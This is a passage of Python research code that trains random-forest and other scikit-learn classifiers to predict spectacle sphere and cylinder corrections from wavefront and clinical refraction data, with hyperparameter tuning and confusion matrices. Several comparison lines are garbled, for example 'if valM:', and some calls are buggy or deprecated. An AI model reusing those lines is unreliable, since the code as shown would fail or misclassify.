cylinderDelta==None:\n raise Exception('cylinderDelta bins must be defined')\n for lIdx in range(len(data)):\n try:\n classes[lIdx] = cylinderDelta.index(data.loc[lIdx,'EMR:VisualAcuityCylinder'])\n except:\n classes[lIdx] = -1\n\n elif target.lower()=='spheredelta':\n if sphereDelta==None:\n raise Exception('sphere delta must be defined')\n for lIdx in range(len(data)):\n try:\n if groupEndBins:\n if data.loc[data.index[lIdx],'SphereDelta']np.max(sphereDelta):\n classes[lIdx] = numClasses-1\n else:\n classes[lIdx] = sphereDelta.index(data.loc[data.index[lIdx],'SphereDelta'])\n else:\n classes[lIdx] = sphereDelta.index(data.loc[data.index[lIdx],'SphereDelta'])\n except:\n classes[lIdx] = -1\n elif target.lower()=='sphere':\n if sphereDelta==None:\n raise Exception('sphere delta must be defined')\n for lIdx in range(len(data)):\n try:\n classes[lIdx] = sphereDelta.index(data.loc[data.index[lIdx],'EMR:VisualAcuitySphere'])\n except:\n classes[lIdx] = -1\n elif target.lower()=='both':\n if sphereDelta==None or cylinderDelta==None:\n raise Exception('sphreDelta and cylinderDelta must be defined')\n correctionPairs = list(itertools.product(sphereDelta,cylinderDelta))\n # Assign labels based on the correction pairs\n for pIdx in range(len(data.index)):\n try:\n classes[pIdx] = correctionPairs.index(data.loc[data.index[pIdx],'SphereDelta'],data.loc[data.index[pIdx],'CylinderDelta'])\n except:\n classes[pIdx] = -1\n else:\n raise Exception('Option target={} is not supported'.format(target))\n return classes\n else:\n print('Data not loaded or not parsed')\n return None\n\n @ staticmethod\n def _AssignLabel(val,classes,groupEndBins=True):\n '''\n Assign labels from classes to a values\n val-, float\n the delta between objective and subjective (spher or cylinder)\n classes, list\n a list of possible deltas, the order in the list will determine the class number\n groupEndBins, bool, default=True\n if valmax(classes) it will be assigned len(classes)-1\n Output:\n -------\n label, float\n a number corresponding to the class in classes\n\n '''\n\n if groupEndBins:\n m = min(classes)\n M = max(classes)\n if valM:\n return len(classes)-1\n else:\n try:\n return classes.index(val)\n except:\n return -1\n else:\n try:\n return classes.index(val)\n except:\n return -1\n\n def GetFeatureMatrix(self,data, features='all',random=False):\n \"\"\"\n Get feature matrix.\n\n Parameters:\n ------------\n features : {'all',list}, default='auto'\n 'all' - use all features in self.featureList\n or a list of indices from self.featureList\n eye : {'left', 'right', 'both'}, default='both'\n data to use\n autoSelectFeatures: {True,False}, bool, default=False\n automatic feature selection\n Output:\n ---------\n fMat- dataFrame\n feature matrix with columns corresponding to features and rows for observations\n \"\"\"\n featureMat = data\n featureMat = featureMat.loc[:,self.featureList.keys()]\n if random:\n featureMat = self.GenerateRandomPatient(N=len(featureMat))\n\n # Feature indices to use\n if features.__class__ is str:\n if features.lower()=='all':\n fInds = range(len(self.featureList.keys()))\n else:\n raise Exception('option features={} is not supported'.format(features))\n elif features.__class__ is list:\n fInds = features\n else:\n raise Exception('option features={} is not supported'.format(features))\n\n # Set features used\n self.featuresUsed = np.asanyarray(list(self.featureList.keys()))[fInds]\n\n # Return a feature matrix\n return featureMat.loc[:,self.featuresUsed]\n\n def PredictDeltaSet(self,classifier='rf',target='se',\n eye='both',numTrials=10,delta=0.25,trainProp=0.8,\n features='all',autoSelectFeatures = False,\n equalizeTrainingClasses=False,\n classifierParams=dict(),alpha=0.05):\n \"\"\"\n Binary classification to predict inclusion in the Delta set\n based on selected prognostic factors. The Delta set\n is either the spherical equivalent delta, cylinder or sphere delta.\n In all cases, patient within Delta set are those for which |Delta|<=delta,\n with delta a positive scalar.\n\n Parameters:\n -----------\n classifier: {'rf','ab','dt','lr','svm','lda','qda','nb','nn'}, str, default=knn\n rf- random forest,\n ab-adaboost,\n dt- decision tree,\n lr- logistic regression,\n svm- support vector machine,\n lda- linear discriminant analysis,\n qda- quadratic discriminant analysis\n nb- naive bayes,\n nn- neural network\n knn - k-nearest neighbors\n target: {'se','sphere','cylinder'},str, default='seDelta'\n Defining the Delta set\n 'se' - spherical equivalent delta;\n 'sphere' - sphere delta, or sphere correction\n 'cylinder'- cylinder delta, or cylinder correction\n the delta is defined as the objective minus subjective\n eye: {'left','right','both'}, str, default='both'\n data to use for classification\n numTrials: int, default=10\n positive integer defining the number of rounds to run classifier\n delta: float, default = 0.25\n positive scalar defining the set |Delta|<=delta\n trainProp: float, default=0.8\n training proportion, positive scalar smaller than 1\n features: {'all','auto', list}, default='auto'\n 'all'- use all features in self.featureList\n 'auto'- selects features automatically by KS statistics ath the confidence level of 1-alpha\n standardize: bool, default=True\n if True, subtract the mean and divide each feature by its STD\n equalizeTrainingClasses: bool, default=False\n make equal the proportion of each class during training\n alpha: float, default=0.05\n the KS confidence = 1-alpha, in case autoSelectFeatures=True\n \"\"\"\n # Get labels\n data = self.GetData(eye=eye)\n patClass = self.GetClasses(data,predict='deltaSet',delta=delta,target=target)\n fMat = self.GetFeatureMatrix(data,features=features,random=False)\n if autoSelectFeatures:\n # select features (columns of the feature matrix) by KS test\n fMat = self.SelectFeatures(fMat,patClass,alpha=alpha)\n\n # Preallocations\n results = pd.DataFrame()\n success = np.zeros(numTrials)\n failed = np.zeros(numTrials)\n sucPer = np.zeros(numTrials)\n score = np.zeros(numTrials)\n featureRank = np.zeros(shape=fMat.shape[1])\n meanCoeffs = np.ndarray(shape=fMat.shape[1])\n\n for tIdx in range(numTrials):\n print(\"Testing round {}/{}\".format(tIdx+1,numTrials))\n\n # Construct a classifier for the current test\n model = self.GetClassifier(params=classifierParams)\n # Randomly divide the data into training and testing sub-sets\n trainIdx,testIdx = self.GetTrainingAndValidationIndices(patClass,trainProp=trainProp,\n equalizeTrainingClasses=equalizeTrainingClasses)\n featureMatTrain = fMat.loc[fMat.index[trainIdx],self.featuresUsed].values\n featureMatTest = fMat.loc[fMat.index[testIdx],self.featuresUsed].values\n if fMat.shape[1]==1:\n # Reshape to meet function requirements\n featureMatTrain = featureMatTrain.reshape(-1,1)\n featureMatTest = featureMatTest.reshape(-1,1)\n labelMatTrain = patClass[trainIdx]\n labelMatTest = patClass[testIdx]\n\n # Fit model on training data\n model.fit(featureMatTrain, labelMatTrain)\n\n # Predict\n predictedLabels = model.predict(featureMatTest)\n score[tIdx] = model.score(featureMatTest,labelMatTest)\n # Collect results\n success[tIdx] = sum(predictedLabels==labelMatTest)\n failed[tIdx] = len(labelMatTest)-success[tIdx]\n sucPer[tIdx] = 100*success[tIdx]/len(testIdx)\n\n # Result summary to return\n results.loc[0,'succ_mean'] = np.mean(sucPer)\n results.loc[0,'succ_std'] = np.std(sucPer)\n results.loc[0,'succ_max'] = np.max(sucPer)\n results.loc[0,'succ_min'] = np.min(sucPer)\n results.loc[0,'mean_score'] = np.mean(score)\n results.loc[0,'N_train'] = len(trainIdx)\n results.loc[0,'N_test'] = len(testIdx)\n results.loc[0,'N_in_train'] = sum(labelMatTrain)\n results.loc[0,'N_in_test'] = sum(labelMatTest)\n results.loc[0,'N_succ_mean'] = np.mean(success)\n results.loc[0,'N_succ_std'] = np.std(success)\n results.loc[0,'N_fail_mean'] = np.mean(failed)\n results.loc[0,'N_fail_std'] = np.std(failed)\n\n # Construct a histogram of importance of features\n if np.isin(classifier.lower(),['logisticregression','lr']):\n self.featureRank = featureRank/(np.sum(featureRank)*numTrials) # normalize\n self.meanCoeffs = meanCoeffs/numTrials # mean values\n elif np.isin(classifier.lower(),['decisiontree','dt','randomforest','rf']):\n self.featureRank = model.feature_importances_\n\n return results\n\n def GenerateRandomPatient(self,N=1,eye='both'):\n \"\"\"\n Generate a random patient by sampling feature values from empirical feature distribution\n \"\"\"\n fMat = pd.DataFrame()\n data = self.GetData(eye=eye)\n for f in self.featureList.keys():\n # compute feature empirical distribution\n # uVals = list(np.unique(data[f]))\n p = np.zeros(len(data[f]))\n for uIdx in range(len(data[f])):\n p[uIdx] = np.sum(data[f]==data.loc[uIdx,f])\n p = p/np.sum(p)\n\n # randomly select values for feature based on the empirical distribution\n fMat[f] = np.random.choice(data[f],size=N,p=p)\n return fMat\n\n def PredictCorrection(self,eye='both',target='cylinder',\n numTrials=5,classifier='rf',\n trainProp=0.8,\n sphereDelta=[-0.5,-0.25, 0.0, 0.25],\n cylinderDelta=[-0.25, 0.0],\n equalizeTrainingClasses=False,\n classifierParams={},features='all',\n autoSelectFeatures=False,alpha=0.05,\n featureSelectionMode='fpr',\n rejProp=0.8,\n groupEndBins=False):\n \"\"\"\n Predict the sphere-cylinder correction pairs.\n\n Parameters:\n -----------\n eye: {'left,'right','both'},str default='both'\n data to use\n target: {'sphere','cylinder','both'}, str, default='cylinder'\n classify into cylinder correction classes, sphere correction classes,\n or all combinations of sphere and cylinder pairs defained by sphereDelta, cylinderDelta\n for cylinderDelta, the sphereDelta range is ignored;\n for sphereDelta, the cylinderDelta range is ignored.\n numTrials: int, default=5\n number of times to run the classifier\n classifier: {'lr','dt','knn','nb','nn','lda','qda','rf'}, str, default='rf'\n classifier to use. see Getclassifier for options\n standardize: {True,False}, bool, default=True\n standardize the trining and validation data\n trainProp: float, default=0.9\n proportion of the data used for training\n equalizeTrainingClasses: bool, default=False\n make the size of classes equal in the training data\n autoSelectFeatures: bool. default=True\n automatically select features by pairwise kolmogorov smirnoff test\n alpha: float, default=0.05\n the confidence level of the KS test conf=1-alpha, for which to reject the null hypothesis\n is case autoSelectFeatures=True\n rejProp: float, default==0.8\n in pairswise KS test, select those features which their null hypothesis is\n rejected at least round(rejProp*(numClasses-1)) times\n groupEndBins: bool, default=True\n observations with deltamax are assigned end bins' labels\n Output:\n --------\n res: dataframe\n statistics and accuracy results for the classification\n confMat: array\n confusion matrix\n \"\"\"\n\n data = self.GetData(eye=eye) # Get parsed data\n\n # This gives a total of |cylinderDelta|x|sphereDelta| number of classes\n # Discard all patients for whom the correction (delta) is not in the correction pairs\n fMat = self.GetFeatureMatrix(data,features=features)\n\n labels = self.GetClasses(data,predict='correction',\n target=target,\n sphereDelta=sphereDelta,\n cylinderDelta=cylinderDelta,\n groupEndBins=groupEndBins)\n\n # Discard unlabeled, truncate the labels and the feature matrix accordingly\n print(f'Discarding {sum(labels==-1)} unlabeled observations ({100*sum(labels==-1)/len(labels)}%, remaining {sum(labels!=-1)})')\n validInds = np.where(labels!=-1)[0]\n labels = labels[validInds]\n fMat = fMat.iloc[validInds]\n data = data.iloc[validInds]\n numClasses = len(np.unique(labels))\n correctionPairs = list(itertools.product(sphereDelta,cylinderDelta))\n\n # Select features automatically by a pairwise ks test\n if autoSelectFeatures:\n fMat = self.SelectFeatures(fMat,labels,alpha=alpha,mode=featureSelectionMode)\n # Construct empirical distributions of classes to draw samples from\n classProb = np.zeros(numClasses,dtype=np.int)\n for pIdx in range(numClasses):\n classProb[pIdx] = np.sum(labels==pIdx)\n classProb = classProb/sum(classProb)\n\n # Previous objective and subjective sphere and cylinder\n objSphere = data['WF_SPHERE_R_3']\n subSphere = data['EMR:VisualAcuitySphere']\n objCylinder = data['WF_CYLINDER_R_3']\n subCylinder = data['EMR:VisualAcuityCylinder']\n sphDelta = objSphere - subSphere\n cylDelta = objCylinder - subCylinder\n\n # Preallocations\n res = pd.DataFrame()\n accuracy = np.zeros(numTrials, dtype=np.float)\n accuracyRand = np.zeros(numTrials, dtype=np.float)\n delta0_25_before = np.zeros(numTrials, dtype=np.float)\n delta0_5_before = np.zeros(numTrials, dtype=np.float)\n delta0_25_after = np.zeros(numTrials, dtype=np.float)\n delta0_5_after = np.zeros(numTrials, dtype=np.float)\n deltaRand0_25 = np.zeros(numTrials, dtype=np.float)\n deltaRand0_5 = np.zeros(numTrials, dtype=np.float)\n confMat = np.zeros(shape=(numClasses,numClasses),dtype=np.float)\n # featureRank = np.zeros(shape=fMat.shape[1])\n # Main loop - classifiy\n for tIdx in range(numTrials):\n # Construct a model to predict the delta sphere\n print(f'Trial {tIdx+1}/{numTrials}')\n trainIdx, testIdx = self.GetTrainingAndValidationIndices(labels,trainProp=trainProp,\n equalizeTrainingClasses=equalizeTrainingClasses)\n # Get feature matrix and labels for the current trial\n featureMatTrain = fMat.loc[fMat.index[trainIdx]]\n featureMatTest = fMat.loc[fMat.index[testIdx]]\n labelsTrain = labels[trainIdx]\n labelsTest = labels[testIdx]\n\n # Get classifier for the current trial\n model = self.GetClassifier(params=classifierParams)\n # Train\n model.fit(featureMatTrain,labelsTrain)\n\n # Predict correction\n predictedLabels = model.predict(featureMatTest)\n oldSph = objSphere.loc[objSphere.index[testIdx]].values\n oldCyl = objCylinder.loc[objCylinder.index[testIdx]].values\n\n seDeltaOld = sphDelta.loc[sphDelta.index[testIdx]]+cylDelta.loc[cylDelta.index[testIdx]]/2\n newSph = np.zeros(len(testIdx))\n newCyl = np.zeros(len(testIdx))\n\n accuracy[tIdx] = 100*model.score(featureMatTest,labelsTest)\n # Compute the confusion matrix for this trial\n for prlIdx in range(len(predictedLabels)):\n confMat[labelsTest[prlIdx],predictedLabels[prlIdx]]+=1\n if target.lower()=='cylinderdelta':\n newCyl[prlIdx] = oldCyl[prlIdx] - cylinderDelta[predictedLabels[prlIdx]]\n elif target.lower()=='cylinder':\n newCyl[prlIdx] = cylinderDelta[predictedLabels[prlIdx]]\n elif target.lower()=='spheredelta':\n newSph[prlIdx] = oldSph[prlIdx] - sphereDelta[predictedLabels[prlIdx]]\n elif target.lower()=='sphere':\n newSph[prlIdx] = sphereDelta[predictedLabels[prlIdx]]\n elif target.lower()=='both':\n for prlIdx in range(len(testIdx)):\n newSph[prlIdx]= oldSph[prlIdx] - correctionPairs[predictedLabels[prlIdx]][0]\n newCyl[prlIdx]= oldCyl[prlIdx] - correctionPairs[predictedLabels[prlIdx]][1]\n else:\n raise Exception(f'option: {target} is not supported')\n\n # Assign the correction to the objective and compute the spherical Eq delta\n if np.isin(target.lower(),['cylinder','cylinderdelta']):\n deltaNew = newCyl - subCylinder.loc[subCylinder.index[testIdx]].values\n deltaOld = cylDelta.loc[cylDelta.index[testIdx]]\n delta0_25_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.25)[0])/len(deltaNew)\n delta0_5_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.5)[0])/len(deltaNew)\n delta0_25_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.25)[0])/len(deltaOld)\n delta0_5_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.5)[0])/len(deltaOld)\n elif np.isin(target.lower(),['sphere','spheredelta']):\n deltaNew = newSph - subSphere.loc[subSphere.index[testIdx]].values\n deltaOld = sphDelta.loc[sphDelta.index[testIdx]]\n delta0_25_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.25)[0])/len(testIdx)\n delta0_5_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.5)[0])/len(testIdx)\n delta0_25_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.25)[0])/len(testIdx)\n delta0_5_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.5)[0])/len(testIdx)\n elif target.lower()=='both':\n deltaNew = newSph+newCyl/2 - (oldSph+oldCyl/2)\n deltaOld = seDeltaOld\n delta0_25_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.25)[0])/len(testIdx)\n delta0_5_after[tIdx] = len(np.where(np.abs(deltaNew)<=0.5)[0])/len(testIdx)\n delta0_25_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.25)[0])/len(testIdx)\n delta0_5_before[tIdx] = len(np.where(np.abs(deltaOld)<=0.5)[0])/len(testIdx)\n\n\n # sphEqDeltaNew = newSph+newCyl/2\n # delta0_25_after[tIdx] = len(np.where(np.abs(sphEqDeltaNew)<=0.25)[0])/len(testIdx)\n # delta0_5_after[tIdx] = len(np.where(np.abs(sphEqDeltaNew)<=0.5)[0])/len(testIdx)\n\n # draw correction pairs by random samples for the empirical distribution\n randSphCorr = np.zeros(len(testIdx),dtype=np.float)\n randCylCorr = np.zeros(len(testIdx),dtype=np.float)\n rndSucc = np.zeros(len(testIdx),dtype=np.int)\n for pIdx in range(len(testIdx)):\n corrInd = np.random.choice(range(numClasses),p=classProb)\n rndSucc[pIdx] = corrInd==labelsTest[pIdx]\n if target.lower()=='cylinder':\n randCylCorr[pIdx] = cylinderDelta[corrInd]\n randSphCorr[pIdx] = 0\n elif target.lower()=='sphere':\n randSphCorr[pIdx] = sphereDelta[corrInd]\n randCylCorr[pIdx] = 0\n elif target.lower()=='both':\n randSphCorr[pIdx] = correctionPairs[corrInd][0]\n randCylCorr[pIdx] = correctionPairs[corrInd][1]\n\n newSphRand = oldSph - randSphCorr\n newCylRand = oldCyl - randCylCorr\n accuracyRand[tIdx] = 100*sum(rndSucc)/len(testIdx)\n sphEqRand = (newSphRand) + (newCylRand)/2\n deltaRand0_25[tIdx] = len(np.where(sphEqRand<=0.25)[0])/len(testIdx)\n deltaRand0_5[tIdx] = len(np.where(sphEqRand<=0.5)[0])/len(testIdx)\n\n # Construct a histogram of importance of features\n self.featureRank = model.feature_importances_\n\n # Summarize results\n res.loc[0,'succ_mean'] = np.mean(accuracy)\n res.loc[0,'succ_min'] = np.min(accuracy)\n res.loc[0,'succ_max'] = np.max(accuracy)\n res.loc[0,'mean_delta_0_25_before'] = np.mean(delta0_25_before)\n res.loc[0,'mean_delta_0_25_after'] = np.mean(delta0_25_after)\n res.loc[0,'mean_delta_0_5_before'] = np.mean(delta0_5_before)\n res.loc[0,'mean_delta_0_5_after'] = np.mean(delta0_5_after)\n res.loc[0,'mean_delta_0_25_rand'] = np.mean(deltaRand0_25)\n res.loc[0,'mean_delta_0_5_rand'] = np.mean(deltaRand0_5)\n res.loc[0,'succ_rand'] = np.mean(accuracyRand)\n res.loc[0,'succ_std'] = np.std(accuracy)\n res.loc[0,'N'] = len(labels)\n res.loc[0,'N_train'] = len(trainIdx)\n res.loc[0,'N_test'] = len(testIdx)\n\n # for cIdx in range(len(confMat)):\n # confMat[cIdx] = confMat[cIdx]/np.sum(confMat)\n return res, confMat/np.sum(confMat)\n\n def GetData(self,eye='both'):\n \"\"\"\n Get data from left right or both eyes\n Parameters:\n --------\n eye: {'left','right','both'}\n\n \"\"\"\n if eye.lower()=='left':\n data = self.Left.copy()\n elif eye.lower()=='right':\n data = self.Right.copy()\n elif eye.lower()=='both':\n data = self.Both.copy()\n else:\n raise Exception('option eye={} is nnot supported'.format(eye))\n\n return data\n\n def TuneHyperParameters(self,classifier='rf',paramDomain=None,\n target='cylinder',predict='correction',\n cylinderDelta = [-1,-0.75,-0.5,-0.25,0.0],\n sphereDelta = [-0.75,-0.5,-0.25,0,0.25,0.5,0.75],\n eye='both', features='all',\n searchType = 'random',\n n_iter = 100,crossValidations=3):\n \"\"\"\n Use the hyperparameter tuning method in sklearn to tune parameters\n and obtained a trained classifier\n Parameters:\n ------------\n paramDomain: dictionary, default=None\n a dictionary with names of parameters as keys and values to check as values\n A sample parameter domain can be obtained from self.GenerateParameterDomain\n target: {}\n\n \"\"\"\n if paramDomain is None:\n paramDomain = self.GenerateParameterDomain(classifier=classifier) # use default parameter domain\n\n model = self.GetClassifier()\n # prepare data\n if eye.lower()=='left':\n data = self.Left\n elif eye.lower()=='right':\n data = self.Right\n elif eye.lower()=='both':\n data = self.Both\n featMat = self.GetFeatureMatrix(data,features=features)\n # get classes\n classes = self.GetClasses(self.Both,predict=predict,target=target,\n cylinderDelta=cylinderDelta,\n sphereDelta=sphereDelta)\n\n # truncate missing classes from data\n inds = np.where(classes!=-1)[0]\n print(f\"Using {len(inds)}/{len(classes)} ({len(inds)/len(classes)}%) observations\")\n data = data.iloc[inds]\n classes = classes[inds]\n featMat = featMat.iloc[inds]\n # get training and validation indices\n training, testing = self.GetTrainingAndValidationIndices(classes)\n\n # Random search of parameters, using n-fold cross validation,\n # search across different combinations, and use all available cores\n if searchType.lower()=='random':\n tunedClassifier = RandomizedSearchCV(estimator = model, param_distributions = paramDomain,\n n_iter = n_iter, cv = crossValidations,\n verbose=2, random_state=42,\n n_jobs = -1)# Fit the random search model\n elif searchType.lower()=='grid':\n tunedClassifier = GridSearchCV(estimator = model, param_grid = paramDomain,\n cv = crossValidations,\n verbose=2,\n n_jobs = -1)# Fit the random search model\n tunedClassifier.fit(featMat.iloc[training], classes[training])\n\n # print statistics\n predictedLabels = tunedClassifier.best_estimator_.predict(featMat.iloc[testing])\n print(f'Classifier Score {tunedClassifier.best_estimator_.score(featMat.iloc[testing],classes[testing])}')\n # Construct confusion matrix\n if target.lower() == 'cylinder':\n confMat = np.zeros(shape=(len(cylinderDelta),len(cylinderDelta)))\n elif target.lower() =='sphere':\n confMat = np.zeros(shape=(len(sphereDelta),len(sphereDelta)))\n\n groundTruth = classes[testing]\n for pIdx in range(len(predictedLabels)):\n confMat[int(groundTruth[pIdx]),int(predictedLabels[pIdx])]+=1\n\n print('____ Results____')\n print(f'Accuracy {target}=0: {np.sum(np.diag(confMat))/np.sum(confMat)}')\n print(f'Accuracy {target}<=0.25: {(np.sum(np.diag(confMat))+np.sum(np.diag(confMat,1))+np.sum(np.diag(confMat,-1)))/np.sum(confMat)}')\n print(f'Accuracy {target}<=0.5: {(np.sum(np.diag(confMat))+np.sum(np.diag(confMat,1))+np.sum(np.diag(confMat,-1))+np.sum(np.diag(confMat,2))+np.sum(np.diag(confMat,-2)))/np.sum(confMat)}')\n\n # Load the classifier class with class names sphere and cylinder delta and feature names\n classifier = tunedClassifier.best_estimator_\n classifier.featuresUsed = self.featuresUsed\n classifier.sphereDelta = sphereDelta\n classifier.cylinderDelta = cylinderDelta\n classifier.predictionType = predict\n return classifier, confMat\n\n def GridFitClassifier(self,classifier='rf',\n maximize='min',\n predict='correction',target='cylinder',\n delta=0.25,eye='both',\n numTrials=10,features='all',\n autoSelectFeatures=False,\n standardize=False,alpha=0.05,\n rejProp=0.667,trainProp=0.8,\n sphereDelta=[-0.5,-0.25,0.0,0.25,0.5],\n cylinderDelta =[-0.75,-0.5,-0.25,0.0],\n equalizeTrainingClasses=False):\n\n \"\"\"\n DEPRECATED, now replaced by TuneHyperParameters\n Tune hyper-paramters of a classifier training and validating it on each point of a parameter space.\n\n Parameters:\n --------------\n classifier: list, default=['lr','knn']\n classifiers to\n predict: {'correction','deltaset'}, str, default='correction'\n predict delta set spherical equivalent, cylinder delta or sphere delta,\n as specified by target, or correction, spher correction, cylinder correction\n or both as specified by target.\n target: {'se','cylinder','sphere'}, str, default='cylinder'\n for predict='deltaSet', the spherical equivalent (se), the cylinderDelta (cylinder)\n or the sphereDelta (sphere) are the zero set in the binary classification problem.\n when predict='correction', target determines whether classification is\n performed on cylinder correction using the classes defined in cylinderDelta\n\n sphereDelta: {list}, default=[-0.5,-0.25,0.0,0.25]\n value of sphere correction to classify to.\n only taken into acount if predict='correction', and target='sphere or 'both'\n cylinderDelta: {list}, default=[-0.25,0.0],\n value of cylinder correction to classify to .\n Only taken into account if predict='correction', and target='cylinder' or 'both'\n delta: float, default=0.25\n defines the Delta set for which |Delta|<=delta\n for predict='deltaSet'\n eye: {'left','right','both'}, str, default='both'\n Perform classification on the data for a specific eye\n maximize: {'min','max','mean}, str, default='min'\n chose those set of parameters which either maximize the\n minimal accuracy (min), average accuracy (mean), or maximal accuracy (max)\n Output:\n --------\n meanParams: dict\n classifier parameter yielding best mean score\n meanScore: float\n classification score obtained using meanParams\n maxParams: dict\n a dictionary with parametes yielding best max score\n maxScore: float\n classification score obtained using maxParams\n \"\"\"\n if classifier.__class__ is str:\n classifier=[classifier]\n elif classifier.__class__ is not list:\n raise Exception('classifier must be either the name of the classifier or a list of names')\n\n bestResults = pd.DataFrame() # records from all classifiers\n bestParams = np.ndarray(shape=len(classifier),dtype=dict)\n cIdx = 0\n for classIdx in classifier:\n # get classifier specific parameters\n params = self.GetClassifier().get_params()\n domain = self.GenerateParameterDomain(classIdx)\n # Preallocate grid score results\n vals = list(domain.values())\n attr = list(domain.keys())\n bestScore = 0\n print('Testing classifier: {}'.format(classIdx))\n for vInds in list(itertools.product(*vals)):\n # Assign parameters\n for vIdx in range(len(vInds)):\n params.__setitem__(attr[vIdx],vInds[vIdx])\n print(f'setting {attr[vIdx]} to {vInds[vIdx]}')\n # Run classifier\n if predict.lower() =='deltaset':\n results = self.PredictDeltaSet(classifier=classIdx,target=target,\n eye=eye,numTrials=numTrials,\n delta=delta,features=features,\n autoSelectFeatures=autoSelectFeatures,\n equalizeTrainingClasses=equalizeTrainingClasses,\n # standardize=standardize,\n trainProp=trainProp,\n classifierParams=params,alpha=alpha)\n elif predict.lower() =='correction':\n results, _ = self.PredictCorrection(classifier=classIdx,target=target,\n numTrials=numTrials,\n # standardize=standardize,\n autoSelectFeatures=autoSelectFeatures,\n trainProp=trainProp,\n rejProp=rejProp,\n cylinderDelta=cylinderDelta,\n sphereDelta=sphereDelta,\n equalizeTrainingClasses=equalizeTrainingClasses,\n classifierParams=params,alpha=alpha)\n\n if maximize.lower()=='mean' and results.loc[0,'succ_mean']>bestScore:\n bestScore = results.loc[0,'succ_mean']\n newBestScore = True\n elif maximize.lower()=='min' and results.loc[0,'succ_min']>bestScore:\n bestScore = results.loc[0,'succ_min']\n newBestScore = True\n elif maximize.lower()=='max' and results.loc[0,'succ_max']>bestScore:\n print('here')\n bestScore = results.loc[0,'succ_max']\n newBestScore = True\n else:\n newBestScore = False\n\n if newBestScore:\n bestResults.loc[cIdx,'classifier'] = classIdx\n bestResults.loc[cIdx,'min'] = results.loc[0,'succ_min']\n bestResults.loc[cIdx,'mean'] = results.loc[0,'succ_mean']\n bestResults.loc[cIdx,'max'] = results.loc[0,'succ_max']\n bestResults.loc[cIdx,'rand'] = results.loc[0,'succ_rand']\n bestResults.loc[cIdx,'std'] = results.loc[0,'succ_std']\n # copy classifier parameters\n bestParams[cIdx] = params.copy()\n cIdx+=1\n return bestResults, bestParams\n\n def GenerateParameterDomain(self, classifier):\n \"\"\"\n This is a service function to generate a domain of hypoerparameters\n be used in GridFitClassifier for tuning\n Parameters:\n -----------\n classifier: str, classifier name or initials\n classifier name, see GetClassifier for classifier names and initials\n Output:\n ---------\n domain: dict,\n dictioinary with classifier specific parameter names\n and range of values to be tested\n\n \"\"\"\n if np.isin(classifier.lower(),['lr','logisticregression']):\n domain = {'C':[0.01, 0.5, 1.0,5.0,10.0],'solver':['newton-cg'],\n 'penalty':['l2','none']}\n elif classifier.lower()=='svm':\n domain = {'C':[0.01,0.1,1.0,5.0,10.0,50.0],\n 'kernel':['poly','rbf','sigmoid'],\n 'degree':[1,2,3],\n 'gamma':['scale']}\n elif np.isin(classifier.lower(),['dt','decisiontree']):\n domain = {'criterion':['gini','entropy'],\n 'max_depth':[10,100,200,300],\n 'max_leaf_nodes':[2,5,10,20],\n 'min_samples_leaf':[10,20,50],\n 'min_samples_split':[2,4,6,10]}\n elif np.isin(classifier.lower(),['rf','randomforest']):\n domain = {'max_depth':[100,200,300,400,500],\n 'n_estimators':[100,200,300,400,500,600,1000],\n 'criterion':['gini','entropy'],\n 'min_samples_split':[2,5,10,20]}\n # 'min_samples_leaf':[1,5,10]}\n elif np.isin(classifier.lower(),['nn','neuralnetwork']):\n domain = {'activation':['relu','logistic'],\n 'hidden_layer_sizes':[(10,),(10,10,),(10,10,10,),(5,10,20)],\n 'solver':['lbfgs','adam'],\n 'alpha':[1e-1,1e-3,1e-4],\n 'early_stopping':[True,False],\n 'learning_rate':['constant','adaptive']}\n elif np.isin(classifier.lower(),['knn']):\n domain = {'weights':['distance','uniform'],\n 'n_neighbors':[5,10,30,50,80,100],\n 'p':[1,2,3,4],\n 'leaf_size':[2,5,10,20,50],\n 'algorithm':['kd_tree','ball_tree','brute']}\n elif np.isin(classifier.lower(),['nb','naivebayes']):\n domain = {'var_smoothing':[1e-1,1e-2,1e-3,1e-5,1e-9]}\n elif np.isin(classifier.lower(),['ab','adaboost']):\n domain = {'n_estimators':[5,10,20,50,100,150],\n 'learning_rate':[1.0,0.5, 0.1]}\n elif np.isin(classifier.lower(),['qda','quadraticdiscriminantanalysis']):\n domain = {'reg_param':[0.1,1.0,2.0,5.0],\n 'store_covariance':[True,False],\n 'tol':[1e-1,1e-2,1e-4,1e-5]}\n elif np.isin(classifier.lower(),['lda','lineardiscriminantanalysis']):\n domain = {'solver':['lsqr','eigen'],\n 'shrinkage':[0.01,0.1, 0.5,'auto']}\n else:\n raise Exception('option classifier={} is not supported'.format(classifier))\n\n return domain\n\n def GetClassifier(self,params=dict()):\n \"\"\"\n Construct a classifier save on the class\n Parameters:\n -----------\n classifier: {'lr','svm','dt','rf','nn','nb','ab','qda','lda','knn','bag'}, default:\n knn'\n classifier name or initials:\n logistic regression: 'lr', or 'logisticRegression'\n support vector machine: 'svm'\n Decision tree: 'dt', or 'decisionTree'\n Random forest: 'rf', or 'randomForest'\n Neural network: 'nn', or 'neuralNetwork'\n Naive bayes: 'nb', or 'naiveBayes'\n adaboost': 'ab', or 'adaboost'\n linear discriminant analysis: 'lda', or lineardiscriminantanalysis\n quadratic descriminant analysis: 'qda', or 'quadraticdiscriminantanalysis'\n k nearest-neighbors: 'knn'\n\n params: dict\n A dictionary with keys as classifier specific parameter and values\n\n Output:\n -----------\n model -\n A classifier class\n \"\"\"\n\n model = RandomForestClassifier(max_depth=200,\n n_estimators=500,\n min_impurity_split = None,\n criterion = 'gini',\n # min_samples_split = 45,\n # min_samples_leaf= 50,\n # max_leaf_nodes = 9,\n # bootstrap=True,\n # max_features=15,\n warm_start=True, # n_estimators increases with each trial to fit new trees\n oob_score=True)\n\n\n # Set classifier parameters from input params\n if len(params.keys())>0:\n modelParams= list(model.get_params().keys())\n for kIdx in params.keys():\n if np.isin(kIdx,modelParams):\n model.__setattr__(kIdx,params.get(kIdx))\n else:\n raise Exception(f'Parameter {kIdx} is not supported for classifier Random forest')\n return model\n\n def LoadCylinderClassifier(self,modelPath):\n # load a cylinder corection model\n self.cylModel = 